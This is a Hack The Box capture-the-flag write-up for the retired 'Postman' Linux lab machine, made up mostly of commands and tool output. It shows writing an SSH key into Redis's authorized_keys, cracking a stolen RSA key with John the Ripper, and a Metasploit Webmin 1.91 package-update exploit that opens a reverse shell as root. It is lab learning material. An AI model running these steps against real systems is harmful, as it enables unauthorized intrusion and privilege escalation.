HTB: Postman (Linux Machine)

Hack The Box - “Postman” - Linux - 10.10.10.160

Completed: December 7th, 2019

Retired: March 12th, 2020

Foothold / User

Nmap scan of all ports turned up a couple of interesting clues:

• Redis running on port 6379 (lots of info online about a pertinent vulnerability)
• Webmin v1.91 (also lots of info online about the vuln there) on port 10000

I wasn’t too familiar with redis, but did enough digging to come up with a way of accessing redis-cli on the server.

ssh-keygen -t rsa

(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > key.txt

redis-cli -h 10.10.10.160 flushall
cat key.txt | redis-cli -h 10.10.10.160 -x set crackit
redis-cli -h 10.10.10.160 config set dir /var/lib/redis/.ssh/
redis-cli -h 10.10.10.160 config set dbfilename "authorized_keys"
redis-cli -h 10.10.10.160 save

and then:

ssh -i /root/.ssh/id_rsa redis@10.10.10.160

After a few attempts (there were other people using the machine), I gained access to Redis@Postman.

With the Redis user, I was able to poke around quite a bit. I could look in the “Matt” user folder and saw the “user.txt” flag I needed, but couldn’t access it without his creds. Under /opt/, there was an encrypted rsa key backup named “id_rsa.bak”, which I copied over to my own machine to crack.

From previous experience I was already familiar with ssh2john, which can convert rsa keys to a format that can be passed to john the ripper, so I used it to crack the key backup. Running it and saving the output looked like this:

python ssh2john.py matt.key > output.hash

cat output.hash
matt.key:$sshng$0$8$73E9CEFBCCF5287C$1192$25e840e75235eebb0238e56ac96c7e0bc…

With this output hash, I could run it through john against the typical rockyou list and get the final password:

ben@kali-linux:~/tools
└──> john --wordlist=/usr/share/wordlists/rockyou.txt output.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (matt.key)
1g 0:00:00:08 DONE (2019-12-06 23:24) 0.1124g/s 1613Kp/s 1613Kc/s 1613KC/sa6_123..*7¡Vamos!
Session completed

Since I was still logged in as the Redis user on another terminal, a simple “su Matt” using the “computer2008” password worked as a pivot. From there I had access to the user flag.

Root

Getting root was very straightforward, since I was already aware of a vulnerability in Webmin 1.91 which involved priv escalation while installing packages. With my user credentials for the Webmin portal (Username: Matt, Password: computer2008) I was able to open a port locally with netcat and run the exploit (I know, I know):

msf5 > use exploit/linux/http/webmin_packageup_rce
set RHOSTS 10.10.10.160
set SSL true
set LHOST 10.10.XX.XX
set USERNAME Matt
set PASSWORD computer2008

msf5 exploit(linux/http/webmin_packageup_rce) > run
[*] Started reverse TCP handler on 10.10.XX.XX:4444
[+] Session cookie: ffa3708422108ae96701bbfc53621920
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.XX.XX:4444 -> 10.10.10.160:56646) at 2019-12-06 23:31:46 -0700

id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
a2577<snip>6ddce

Overall the machine was fairly simple and straightforward. I was a little sad to see it get retired, since I think it’s a great machine for anyone at any skill level, with the possibility of self-imposed restrictions available to make it more challenging (i.e. no msf). Hopefully it was replaced with a comparable machine (haven’t checked it out yet).